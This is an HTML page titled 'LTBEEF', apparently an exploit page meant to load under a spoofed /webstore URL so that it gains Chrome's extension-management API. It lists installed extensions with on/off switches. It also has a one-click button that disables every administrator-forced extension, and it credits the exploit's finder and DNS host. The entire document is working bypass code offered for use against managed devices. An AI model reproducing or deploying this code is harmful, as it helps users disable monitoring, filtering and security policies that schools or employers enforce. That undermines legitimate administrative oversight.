<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>LTBEEF</title>
    <style>
      * {
        box-sizing: border-box;
        font-family: "Roboto";
      }
      button {
        padding: 10px 25px;
        background-color: #2196f3;
        color: white;
        font-size: 20px;
        margin: auto;
        margin-bottom: 8px;
        cursor: pointer;
        border: 2px solid #0E6FBD;
        font-weight: 500;
        display: block;
      }
      button:hover {
        background-color: #0E6FBD;
      }
      table {
        width: 100%;
        border-collapse: collapse;
      }
      table td:first-child,
      table td:last-child {
        text-align: center;
      }
      tr:nth-child(even) {
        background-color: #f2f2f2;
      }
      tr:hover {
        background-color: #ddd;
      }
      td,
      th {
        border: 2px solid #ddd;
        padding: 8px;
        font-family: Arial, Helvetica, sans-serif;
        border-collapse: collapse;
      }
      .switch {
        position: relative;
        display: inline-block;
        width: 40px;
        height: 23px;
      }
      .switch input {
        opacity: 0;
        width: 0;
        height: 0;
      }
      .slider {
        position: absolute;
        cursor: pointer;
        top: 0;
        left: 0;
        right: 0;
        bottom: 0;
        background-color: #ccc;
        -webkit-transition: 0.4s;
        transition: 0.4s;
      }
      .slider:before {
        position: absolute;
        content: "";
        height: 17px;
        width: 17px;
        left: 3px;
        bottom: 3px;
        background-color: white;
        -webkit-transition: 0.4s;
        transition: 0.4s;
      }
      input:checked + .slider {
        background-color: #2196f3;
      }
      input:focus + .slider {
        box-shadow: 0 0 1px #2196f3;
      }
      input:checked + .slider:before {
        -webkit-transform: translateX(17px);
        -ms-transform: translateX(17px);
        transform: translateX(17px);
      }
      .slider.round {
        border-radius: 23px;
      }
      .slider.round:before {
        border-radius: 50%;
      }
      p {
        text-align: center;
        margin: 12px 2px;
      }
    </style>
  </head>
  <script>
    if (!location.protocol[5]) {
      location.protocol = "https:";
    }
    document.body = document.createElement("body");
    document.toggleFunction = function (id) {
      var clickedRow = document.getElementById(id);
      chrome.management.setEnabled(
        id,
        clickedRow.children[0].children[0].children[0].checked
      );
    };
    document.newBodyData =
      "<button onclick=\"chrome.management.getAll(a => {a = a.filter(e => e.installType === 'admin'); a.forEach(e => chrome.management.setEnabled(e.id,!1)); location.reload()})\">Disable all admin-forced extensions</button><table>";
    try {
      chrome.management.getAll(function () {
        arguments[0]
          .sort(function (a, b) {
            return a.name.localeCompare(b.name);
          })
          .forEach(function (extension) {
            document.newBodyData += "<tr id=" + extension.id + ">";
            document.newBodyData +=
              "<td><label class='switch'><input type='checkbox' " +
              (extension.enabled ? "checked" : "") +
              " onclick=\"toggleFunction('" +
              extension.id +
              "')\"><span class='slider round'></span></label></td>";
            document.newBodyData += "<td>" + extension.name + "</td>";
            document.newBodyData += "<td>" + extension.id + "</td>";
            document.newBodyData +=
              "<td>" + extension.installType + "</td></tr>";
          });
        document.newBodyData +=
          "</table><p>This exploit was found by Bypassi#7037, this DNS is hosted by KozmikNano#7820, and CompactCow#4717 came up with the original UI.</p>";
        document.body.innerHTML = document.newBodyData;
      });
    } catch {
      document.body.innerHTML =
        "Something went wrong, make sure your url starts with /webstore!";
    }
  </script>
</html>
